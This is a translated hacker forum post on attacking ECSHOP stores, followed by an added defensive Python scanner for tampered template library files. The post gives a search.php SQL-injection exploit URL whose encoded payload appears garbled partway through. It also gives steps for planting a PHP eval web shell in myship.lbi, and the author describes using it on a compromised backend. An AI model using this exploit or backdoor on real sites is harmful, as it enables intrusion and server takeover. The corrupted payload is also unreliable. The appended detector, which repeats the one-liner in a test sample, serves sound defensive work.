This is a variant of the search.php exp: search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxmju6ijenksbhbmqgmt0yiedst1vqiejzigdvb2rzx2lkihvuaw9uigfsbcbzzwxly3qgy29uy2f0khvzzxjfbmftzswwednhlhbhc3n3b3jklccixccpihvuaw9uihnlbgvjdcaxiyinkswxigzyb20gzwnzx2fkbwlux3vzzxijijtzoje6ijeio319
To get a SHELL: log in to the backend at /admin/ with the user name and password, go to module management - library management, select myship.lbi and insert <?php eval($_REQUEST['cmd'])?>
I injected my way into a backend and then followed the steps to try it and see if it succeeded. The steps were as follows:
After clicking OK, access http://www.. net/myship.php* and see what has changed on this page; then I used lake2's dual-use one-liner and, sure enough, the connection was successful. As shown in the figure:
The principle behind this method is said to be that ECSHOP's smarty template mechanism allows PHP code to be executed directly, which is what produces the vulnerability. I don't understand smarty at all, but I will try.
This method is really good; once again I am impressed by the skill of the experts. I found nothing online that improves on this method, so having seen it, I am sharing it.
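
A defender-side check for the library-file tampering described above, as an added example that is not part of the original post: it scans template library (.lbi) text for PHP open tags, Smarty {php} blocks and request-driven code execution calls. The rule names, function names and sample file contents are constructed for illustration.

```python
import re
from pathlib import Path

# Server-side code markers that should never appear in a template library item.
RULES = [
    # <?php, <? php, <?= and bare <? (but not an <?xml declaration)
    ("php-open-tag", re.compile(r"<\?(?!xml\b)", re.I)),
    # <script language="php"> form of embedding PHP
    ("php-script-tag", re.compile(r"<script[^>]*language\s*=\s*[\"']?php", re.I)),
    # Smarty 2 {php} ... {/php} block
    ("smarty-php-block", re.compile(r"\{\s*php\s*\}", re.I)),
    # request parameter passed straight to a code or command execution call
    ("request-to-exec", re.compile(
        r"\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*"
        r"\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)),
]

def scan_text(text):
    """Return (line_no, rule, excerpt) for every rule hit in one file's text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((no, name, line.strip()[:80]))
    return findings

def scan_tree(root, suffix=".lbi"):
    """Scan all library files under root; return {relative path: findings}."""
    report = {}
    for path in sorted(Path(root).rglob("*" + suffix)):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

# Constructed samples: a clean library item and the same item after tampering.
CLEAN_LBI = '<div class="ship">{$lang.shipping_method}</div>\n<p>{$shipping.name}</p>\n'
TAMPERED_LBI = CLEAN_LBI + "<?php eval($_REQUEST['cmd'])?>\n"

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_LBI), ("tampered", TAMPERED_LBI)):
        print(label, scan_text(sample))
```

Run scan_tree against the theme's library directory after any backend compromise or on a schedule, and compare hits against a known-good copy of the templates.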